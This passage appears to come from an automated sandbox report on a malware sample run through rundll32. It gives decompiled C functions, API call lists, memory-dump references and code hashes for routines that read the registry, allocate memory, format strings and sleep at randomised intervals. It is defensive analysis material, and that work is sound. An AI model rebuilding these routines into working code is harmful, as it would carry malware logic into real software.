                                          0x048973ab
                                          0x048973af
                                          0x04897489
                                          0x0489748d
                                          0x0489748d
                                          0x048973b8
                                          0x048973bf
                                          0x048973c4
                                          0x048973c9
                                          0x0489747e
                                          0x04897481
                                          0x00000000
                                          0x04897487
                                          0x048973cf
                                          0x048973d2
                                          0x048973d9
                                          0x048973e3
                                          0x048973ec
                                          0x048973f2
                                          0x048973fa
                                          0x04897432
                                          0x0489746c
                                          0x04897472
                                          0x04897474
                                          0x04897474
                                          0x04897476
                                          0x04897479
                                          0x00000000
                                          0x04897479
                                          0x04897447
                                          0x0489744c
                                          0x04897450
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04897450
                                          0x048973ff
                                          0x0489740e
                                          0x00000000
                                          0x00000000
                                          0x04897413
                                          0x0489741c
                                          0x0489741f
                                          0x04897424
                                          0x04897429
                                          0x04897404
                                          0x04897404
                                          0x00000000
                                          0x04897404
                                          0x0489742d
                                          0x00000000
                                          0x0489742d
                                          0x04897401
                                          0x00000000
                                          0x04897452
                                          0x0489745f
                                          0x00000000

                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04892A82,?), ref: 048973A5
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • RegEnumKeyExA.KERNEL32(?,?,?,04892A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04892A82), ref: 048973EC
                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,04892A82,?,04892A82,?,?,?,?,?,04892A82,?), ref: 04897459
                                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04892A82,?), ref: 04897481
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                          • String ID:
                                          • API String ID: 3664505660-0
                                          • Opcode ID: 3209810b42881d2fd95649f0e4c32064f1d2973a4c409d852a5e02cae0c95e64
                                          • Instruction ID: 40607bc6de6a9744da5fa75d3ea80cbffcc0a7b2e2b3a04333fcaeea8e29ad92
                                          • Opcode Fuzzy Hash: 3209810b42881d2fd95649f0e4c32064f1d2973a4c409d852a5e02cae0c95e64
                                          • Instruction Fuzzy Hash: 2C316971D00919EFDF21AFA9C8448EFFFB9EB44714F284A26E951F2161D2742E40DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E04895803(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                          				void* _v8;
                                          				char _v48;
                                          				void* __edi;
                                          				intOrPtr _t22;
                                          				void* _t26;
                                          				intOrPtr _t30;
                                          				intOrPtr _t37;
                                          				intOrPtr* _t43;
                                          				void* _t44;
                                          				void* _t47;
                                          				intOrPtr* _t49;
                                          				void* _t50;
                                          				intOrPtr _t51;
                                          
                                          				_t47 = __edx;
                                          				_t44 = __ecx;
                                          				_t43 = _a16;
                                          				_t49 = __eax;
                                          				_t22 =  *0x489a348; // 0x9ad5a8
                                          				_t2 = _t22 + 0x489b682; // 0x657a6973
                                          				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                                          				_t51 =  *0x489a3e0; // 0x5249ba8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x489a2d8);
                                          				if( *0x489a2ec >= 5) {
                                          					_t26 = RtlAllocateHeap(); // executed
                                          					if(_t26 == 0) {
                                          						L6:
                                          						_a4 = 8;
                                          						L7:
                                          						if(_a4 != 0) {
                                          							L10:
                                          							 *0x489a2ec =  *0x489a2ec + 1;
                                          							L11:
                                          							return _a4;
                                          						}
                                          						_t52 = _a16;
                                          						 *_t49 = _a16;
                                          						_t50 = _v8;
                                          						 *_t43 = E04892087(_t52, _t50); // executed
                                          						_t30 = E04896D7F(_t50, _t52); // executed
                                          						if(_t30 != 0) {
                                          							 *_a8 = _t50;
                                          							 *_a12 = _t30;
                                          							if( *0x489a2ec < 5) {
                                          								 *0x489a2ec =  *0x489a2ec & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_a4 = 0xbf;
                                          						E04893F62();
                                          						HeapFree( *0x489a2d8, 0, _t50);
                                          						goto L10;
                                          					}
                                          					_t37 = E0489636D(_a4, _t47, _t51,  &_v48,  &_v8,  &_a16, _t26);
                                          					L5:
                                          					_a4 = _t37;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t37 = E048959E2(_a4, _t44, _t47, _t51,  &_v48,  &_v8,  &_a16, _t38);
                                          				goto L5;
                                          			}

                                          0x04895803
                                          0x04895803
                                          0x0489580a
                                          0x04895811
                                          0x04895815
                                          0x0489581a
                                          0x04895825
                                          0x0489582b
                                          0x0489583b
                                          0x04895840
                                          0x04895842
                                          0x04895848
                                          0x0489586c
                                          0x04895874
                                          0x04895891
                                          0x04895891
                                          0x04895898
                                          0x0489589c
                                          0x048958d6
                                          0x048958d6
                                          0x048958dc
                                          0x048958e3
                                          0x048958e3
                                          0x0489589e
                                          0x048958a1
                                          0x048958a3
                                          0x048958b0
                                          0x048958b2
                                          0x048958b9
                                          0x048958f0
                                          0x048958f5
                                          0x048958f7
                                          0x048958f9
                                          0x048958f9
                                          0x00000000
                                          0x048958f7
                                          0x048958bb
                                          0x048958c2
                                          0x048958d0
                                          0x00000000
                                          0x048958d0
                                          0x04895887
                                          0x0489588c
                                          0x0489588c
                                          0x00000000
                                          0x0489588c
                                          0x04895852
                                          0x00000000
                                          0x00000000
                                          0x04895865
                                          0x00000000

                                          APIs
                                          • wsprintfA.USER32 ref: 04895825
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0489584A
                                            • Part of subcall function 048959E2: GetTickCount.KERNEL32 ref: 048959F6
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895A46
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895A63
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895A83
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895AAF
                                            • Part of subcall function 048959E2: HeapFree.KERNEL32(00000000,00000000), ref: 04895AC1
                                            • Part of subcall function 048959E2: wsprintfA.USER32 ref: 04895AE2
                                            • Part of subcall function 048959E2: HeapFree.KERNEL32(00000000,00000000), ref: 04895AF2
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0489586C
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 048958D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: wsprintf$Heap$Free$Allocate$CountTick
                                          • String ID:
                                          • API String ID: 1428766365-0
                                          • Opcode ID: 690e94de658986b13e9e2d810dbc2ebd0b6cec1b07bc8d27f6a9b68bd2d5ce3b
                                          • Instruction ID: 5d640b05f3b33c79fa18442c3f698580a82852caff46615193b42bd91ce8c31e
                                          • Opcode Fuzzy Hash: 690e94de658986b13e9e2d810dbc2ebd0b6cec1b07bc8d27f6a9b68bd2d5ce3b
                                          • Instruction Fuzzy Hash: B2312D76600909BBDF06DF98D884A9B37FCFB08354F184916F905E7200EB75AE44DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 41%
                                          			E048929F2(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t20;
                                          				void* _t26;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t20 = E04896174(__ecx,  &_v32); // executed
                                          				_t38 = _t20;
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E048975C6(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				_t26 = E04896955(0x40,  &_v16); // executed
                                          				if(_t26 != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x489a34c, 1, 0,  *0x489a3e4);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8); // executed
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E0489737F(_t36); // executed
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E04896E20(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E04895147(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E04891666( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}

                                          0x048929f2
                                          0x048929ff
                                          0x04892a05
                                          0x04892a06
                                          0x04892a07
                                          0x04892a08
                                          0x04892a09
                                          0x04892a0d
                                          0x04892a14
                                          0x04892a19
                                          0x04892a1d
                                          0x04892aa5
                                          0x04892aa5
                                          0x04892aa8
                                          0x04892aaa
                                          0x04892ab2
                                          0x04892ab8
                                          0x04892abb
                                          0x04892abb
                                          0x04892ab8
                                          0x04892ac6
                                          0x04892ac6
                                          0x04892a29
                                          0x04892a30
                                          0x04892a32
                                          0x04892a32
                                          0x04892a49
                                          0x04892a4d
                                          0x04892a50
                                          0x04892a5b
                                          0x04892a62
                                          0x04892a62
                                          0x04892a6b
                                          0x04892a6f
                                          0x04892a7d
                                          0x04892a71
                                          0x04892a71
                                          0x04892a72
                                          0x04892a73
                                          0x04892a74
                                          0x04892a75
                                          0x04892a76
                                          0x04892a76
                                          0x04892a82
                                          0x04892a85
                                          0x04892a89
                                          0x04892a8b
                                          0x04892a8b
                                          0x04892a92
                                          0x00000000
                                          0x04892a94
                                          0x04892a94
                                          0x04892aa1
                                          0x00000000
                                          0x04892aa1

                                          APIs
                                          • CreateEventA.KERNEL32(0489A34C,00000001,00000000,00000040,?,?,76DDF710,00000000,76DDF730), ref: 04892A43
                                          • SetEvent.KERNEL32(00000000), ref: 04892A50
                                          • Sleep.KERNEL32(00000BB8), ref: 04892A5B
                                          • CloseHandle.KERNEL32(00000000), ref: 04892A62
                                            • Part of subcall function 0489737F: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04892A82,?), ref: 048973A5
                                            • Part of subcall function 0489737F: RegEnumKeyExA.KERNEL32(?,?,?,04892A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04892A82), ref: 048973EC
                                            • Part of subcall function 0489737F: WaitForSingleObject.KERNEL32(00000000,?,?,?,04892A82,?,04892A82,?,?,?,?,?,04892A82,?), ref: 04897459
                                            • Part of subcall function 0489737F: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04892A82,?), ref: 04897481
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                          • String ID:
                                          • API String ID: 891522397-0
                                          • Opcode ID: a04b1f34c18d3da9863078bb2977cbb04314cb335288e2f0de3e2e3fa5a28d46
                                          • Instruction ID: 639a97e51e8600292959bea80eb9e903699a62f9e54e6abe6624c5b3a7177450
                                          • Opcode Fuzzy Hash: a04b1f34c18d3da9863078bb2977cbb04314cb335288e2f0de3e2e3fa5a28d46
                                          • Instruction Fuzzy Hash: 7E214473D00919BFDF20BFA888849AE77EDEB48254B0D4E65EA11E7100EB74BD858761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04894E0B(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                          				long _t26;
                                          				intOrPtr* _t38;
                                          				char* _t42;
                                          				long _t43;
                                          
                                          				if(_a4 == 0) {
                                          					L2:
                                          					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                          					_t43 = _t26;
                                          					if(_t43 == 0) {
                                          						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                          						if(_a4 == 0) {
                                          							_t43 = 0xe8;
                                          						} else {
                                          							_t42 = E04894DF6(_a4);
                                          							if(_t42 == 0) {
                                          								_t43 = 8;
                                          							} else {
                                          								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                          								if(_t43 != 0) {
                                          									E04894C73(_t42);
                                          								} else {
                                          									 *_a20 = _t42;
                                          									_t38 = _a24;
                                          									if(_t38 != 0) {
                                          										 *_t38 = _a4;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						RegCloseKey(_a12); // executed
                                          					}
                                          					L12:
                                          					return _t43;
                                          				}
                                          				_t43 = E04897849(_a4, _a8, _a12, _a16, _a20, _a24);
                                          				if(_t43 == 0) {
                                          					goto L12;
                                          				}
                                          				goto L2;
                                          			}

                                          APIs
                                          • RegOpenKeyW.ADVAPI32(80000002,05249EC2,05249EC2), ref: 04894E44
                                          • RegQueryValueExW.KERNEL32(05249EC2,?,00000000,80000002,00000000,00000000,?,04896EFF,3D048990,80000002,04892A82,00000000,04892A82,?,05249EC2,80000002), ref: 04894E66
                                          • RegQueryValueExW.ADVAPI32(05249EC2,?,00000000,80000002,00000000,00000000,00000000,?,04896EFF,3D048990,80000002,04892A82,00000000,04892A82,?,05249EC2), ref: 04894E8B
                                          • RegCloseKey.KERNEL32(05249EC2,?,04896EFF,3D048990,80000002,04892A82,00000000,04892A82,?,05249EC2,80000002,00000000,?), ref: 04894EBB
                                            • Part of subcall function 04897849: SafeArrayDestroy.OLEAUT32(00000000), ref: 048978D1
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                          • String ID:
                                          • API String ID: 486277218-0
                                          • Opcode ID: 958ab19fcc909c0b1a92c48fe13a4db6809d88c2f742df7b71bfab8dfda04e94
                                          • Instruction ID: ad0988cb8581d13ab5db0a7933085996a90c6adbace0f3a7be9410f34be09c5c
                                          • Opcode Fuzzy Hash: 958ab19fcc909c0b1a92c48fe13a4db6809d88c2f742df7b71bfab8dfda04e94
                                          • Instruction Fuzzy Hash: D6215E7380455EFFDF11AE94DD808EE7BE9FB08660B098A25FE0496110D631AD619B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryValueExA.KERNEL32(00B66085,?,00000000,00B66085,00000000,00B66095,00B66085,?,?,?,?,00B662F4,80000001,?,00B66085,00B66095), ref: 00B6EFA0
                                          • RtlAllocateHeap.NTDLL(00000000,00B66095,00000000), ref: 00B6EFB7
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B662F4,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001,?,00B66085), ref: 00B6EFD2
                                          • RegQueryValueExA.KERNEL32(00B66085,?,00000000,00B66085,00000000,00B66095,?,00B662F4,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001), ref: 00B6EFF1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateFree
                                          • String ID:
                                          • API String ID: 4267586637-0
                                          • Opcode ID: 19d9889e5b4981e14a9329aaeae10636108944d83ed2b5b0105a21edeafe8fab
                                          • Instruction ID: 7c449972e527a1fc9571d0b825bffe69b0c70a1c5c4084e27ec44eed40d39f96
                                          • Opcode Fuzzy Hash: 19d9889e5b4981e14a9329aaeae10636108944d83ed2b5b0105a21edeafe8fab
                                          • Instruction Fuzzy Hash: EB113DBA500118FFEB129F99DC84CEEBBBCEB89750B104066F91597110D7719E40DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E048939B5(void* __ecx, intOrPtr _a4) {
                                          				struct _FILETIME _v12;
                                          				int _t13;
                                          				signed int _t16;
                                          				void* _t18;
                                          				signed int _t19;
                                          				unsigned int _t23;
                                          				void* _t30;
                                          				signed int _t34;
                                          
                                          				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                          				asm("stosd");
                                          				do {
                                          					_t13 = SwitchToThread();
                                          					GetSystemTimeAsFileTime( &_v12);
                                          					_t23 = _v12.dwHighDateTime;
                                          					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                          					_push(0);
                                          					_push(0x13);
                                          					_push(_t23 >> 5);
                                          					_push(_t16);
                                          					L04898326();
                                          					_t34 = _t16 + _t13;
                                          					_t18 = E048954D5(_a4, _t34);
                                          					_t30 = _t18;
                                          					_t19 = 3;
                                          					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                          				} while (_t30 == 1);
                                          				return _t30;
                                          			}

                                          APIs
                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04893D61,?,?), ref: 048939C6
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04893D61,?,?), ref: 048939D2
                                          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 048939EB
                                            • Part of subcall function 048954D5: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04895534
                                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04893D61,?,?), ref: 04893A0A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                          • String ID:
                                          • API String ID: 1610602887-0
                                          • Opcode ID: bb903a3a459dacc5b01a70fb58f15d0439dd0c12b552c9a096ab3490a30ab598
                                          • Instruction ID: bc1c541c89b7443a8272b231591f5ac1d7d71a8a3639819e4e4f3c2c4e66e779
                                          • Opcode Fuzzy Hash: bb903a3a459dacc5b01a70fb58f15d0439dd0c12b552c9a096ab3490a30ab598
                                          • Instruction Fuzzy Hash: 62F0A9B3A005047BDB149A58DC1DBDE77F9DB84355F180514F605E7340E9B4AE008650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516C0
                                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516CB
                                          • _wcsupr.NTDLL ref: 00B516D8
                                          • lstrlenW.KERNEL32(00000000), ref: 00B516E0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                          • String ID:
                                          • API String ID: 2533608484-0
                                          • Opcode ID: 27fe435916b2aa5512973f9fa8ea21aed5f88014904d61216eb380f6612ae3ca
                                          • Instruction ID: e103f8cf77e4ceea5a6327215c2d2ab6a421cb6c3b3807b6e55563cbe0e56589
                                          • Opcode Fuzzy Hash: 27fe435916b2aa5512973f9fa8ea21aed5f88014904d61216eb380f6612ae3ca
                                          • Instruction Fuzzy Hash: B0F0B4725416102E93126B7C5CC9F6F56DDEF94767F2409E8FD04D3150CF65CC4945A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B69CFA
                                            • Part of subcall function 00B623C2: RtlEnterCriticalSection.NTDLL(00000000), ref: 00B623CE
                                            • Part of subcall function 00B623C2: CloseHandle.KERNEL32(?), ref: 00B623DC
                                            • Part of subcall function 00B623C2: RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B623F8
                                          • CloseHandle.KERNEL32(?), ref: 00B69D08
                                          • InterlockedDecrement.KERNEL32(00B7907C), ref: 00B69D17
                                            • Part of subcall function 00B63EC0: SetEvent.KERNEL32(0000039C,00B69D32), ref: 00B63ECA
                                            • Part of subcall function 00B63EC0: CloseHandle.KERNEL32(0000039C), ref: 00B63EDF
                                            • Part of subcall function 00B63EC0: HeapDestroy.KERNELBASE(05D50000), ref: 00B63EEF
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B69D33
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                          • String ID:
                                          • API String ID: 1141245775-0
                                          • Opcode ID: 7473e6d1a403327be3cc212dfe8cd45a9600f7272635121c87af0d30a9128792
                                          • Instruction ID: 1ecf7d1d75201588b829eb434a5cdfd0fcf9ac9ff1a8e418974444a2c6292d38
                                          • Opcode Fuzzy Hash: 7473e6d1a403327be3cc212dfe8cd45a9600f7272635121c87af0d30a9128792
                                          • Instruction Fuzzy Hash: 6EF0C231640210FBD7015F689C09F6A7BACEB42732F5042A8F539932D0DF789D418BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E048968F5(void** __esi) {
                                          				intOrPtr _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				void* _t9;
                                          				intOrPtr _t10;
                                          				void* _t11;
                                          				void** _t13;
                                          
                                          				_t13 = __esi;
                                          				_t4 =  *0x489a3cc; // 0x52495b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x489a3cc; // 0x52495b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t13;
                                          				if(_t8 != 0 && _t8 != 0x489a030) {
                                          					HeapFree( *0x489a2d8, 0, _t8);
                                          				}
                                          				_t9 = E04894117(_v0, _t13); // executed
                                          				_t13[1] = _t9;
                                          				_t10 =  *0x489a3cc; // 0x52495b0
                                          				_t11 = _t10 + 0x40;
                                          				__imp__(_t11);
                                          				return _t11;
                                          			}

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 048968FE
                                          • Sleep.KERNEL32(0000000A), ref: 04896908
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04896930
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 0489694C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: c2598ac2cedfa027efd5d53e3a16f23d438adc7fb6fe5900c9693627e3ed7e33
                                          • Instruction ID: d62b875e36a3b01bc3dfaa9b814b7ad08a6d68e5ccc750b5a34344cace9873ab
                                          • Opcode Fuzzy Hash: c2598ac2cedfa027efd5d53e3a16f23d438adc7fb6fe5900c9693627e3ed7e33
                                          • Instruction Fuzzy Hash: DDF0FE70300A81EBEB29AF69DE49F163BF4EB14744B0C4D08F956D6251EA24EC50DB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B5A3E3
                                          • memcpy.NTDLL ref: 00B5A40B
                                            • Part of subcall function 00B6AD9E: NtAllocateVirtualMemory.NTDLL(00B57A68,00000000,00000000,00B57A68,00003000,00000040), ref: 00B6ADCF
                                            • Part of subcall function 00B6AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B6ADD6
                                            • Part of subcall function 00B6AD9E: SetLastError.KERNEL32(00000000), ref: 00B6ADDD
                                          • GetLastError.KERNEL32(00000010,00000218,00B7327D,00000100,?,00000318,00000008), ref: 00B5A422
                                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B7327D,00000100), ref: 00B5A505
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                          • String ID:
                                          • API String ID: 685050087-0
                                          • Opcode ID: 1ba666668ca591800f0f7e847226eb0bec09516c0e5b29621a669093af31f3ab
                                          • Instruction ID: e578786655af3a840d21f3370bc323b757d1e2e728fdee5c0f449994ec7c4738
                                          • Opcode Fuzzy Hash: 1ba666668ca591800f0f7e847226eb0bec09516c0e5b29621a669093af31f3ab
                                          • Instruction Fuzzy Hash: D04180B1504301AFD721DF64DC81FABB7E8FB58311F008A6DF999D6251EB70D9148BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E048967E2(void* __edx) {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
